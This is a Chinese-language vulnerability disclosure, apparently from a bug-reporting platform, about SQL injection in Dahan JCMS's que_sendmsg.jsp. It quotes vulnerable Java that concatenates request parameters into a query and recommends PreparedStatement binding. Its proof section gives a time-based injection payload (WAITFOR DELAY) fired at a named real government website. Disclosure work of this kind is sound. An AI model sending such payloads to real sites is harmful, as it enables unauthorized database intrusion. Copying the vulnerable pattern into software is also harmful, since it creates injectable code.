### 简要描述:

大汉JCMS 注入漏洞3

### 详细说明:

short_message/que_sendmsg.jsp

```java
String strTitle = ""; /*检索关键字*/
String groupname = "";
String id = Convert.getParameter(request, "loginid", "a");//获取参数
String boxtype = Convert.getParameter(request, "boxtype", "a");
strTitle += groupname;
// 获取表单提交变量(条件参数)
String strQueKeyWords = "";//关键字
String strQueKeyWords1 = "";//高级检索关键字
String strQueScope = "";//范围
String strStartDate = "";//开始日期
String strEndDate = "";//结束日期
strQueKeyWords = Convert.getParameter(request, "que_keywords");
strQueKeyWords1 = Convert.getParameter(request, "que_keywords1");
strQueScope = Convert.getParameter(request, "que_scope");
strStartDate = Convert.getParameter(request, "que_startdate");
strEndDate = Convert.getParameter(request, "que_enddate");
strQueKeyWords = (strQueKeyWords1.length() > 0) ? strQueKeyWords1 : strQueKeyWords;//高级检索的关键字优先
//组织时间条件
String strDateCond = "";
if (!"".equals(strStartDate) && !"".equals(strEndDate)) {
    strDateCond += " AND a.dt_sendtime >= '" + strStartDate + " 00:00:00' AND a.dt_sendtime <= '" + strEndDate + " 23:59:59'";
} else if (!"".equals(strStartDate) && "".equals(strEndDate)) {
    strDateCond += " AND a.dt_sendtime >= '" + strStartDate + " 00:00:00'";
} else if ("".equals(strStartDate) && !"".equals(strEndDate)) {
    strDateCond += " AND a.dt_sendtime <= '" + strEndDate + " 23:59:59'";
}
// 查询条件部分
StringBuffer sbWhere = new StringBuffer(128);
strTitle = "当前位置→发件箱";
sbWhere.append(" a.vc_senderid='"+ id +"'");//插入参数
```

上述片段中，请求参数 `loginid` 的值 `id` 未经过滤或参数绑定便直接拼接进 `sbWhere` 的 WHERE 条件；`que_startdate`、`que_enddate` 同样以字符串拼接方式进入 `strDateCond`，属于同一类问题。修复应改用 `PreparedStatement` 占位符绑定这些参数，而不是拼接 SQL 字符串。

### 漏洞证明:

打开 http://www.sihong.gov.cn/jcms/short_message/que_sendmsg.jsp?loginid=1 ，返回时间正常。

打开 http://www.sihong.gov.cn/jcms/short_message/que_sendmsg.jsp?loginid=1' ; WAITFOR DELAY '0:0:5'-- ，响应延时了。

[![dahan.png](https://images.seebug.org/upload/201405/22011353c2daf83db4460dae72de1aa7be475adf.png)](https://images.seebug.org/upload/201405/22011353c2daf83db4460dae72de1aa7be475adf.png)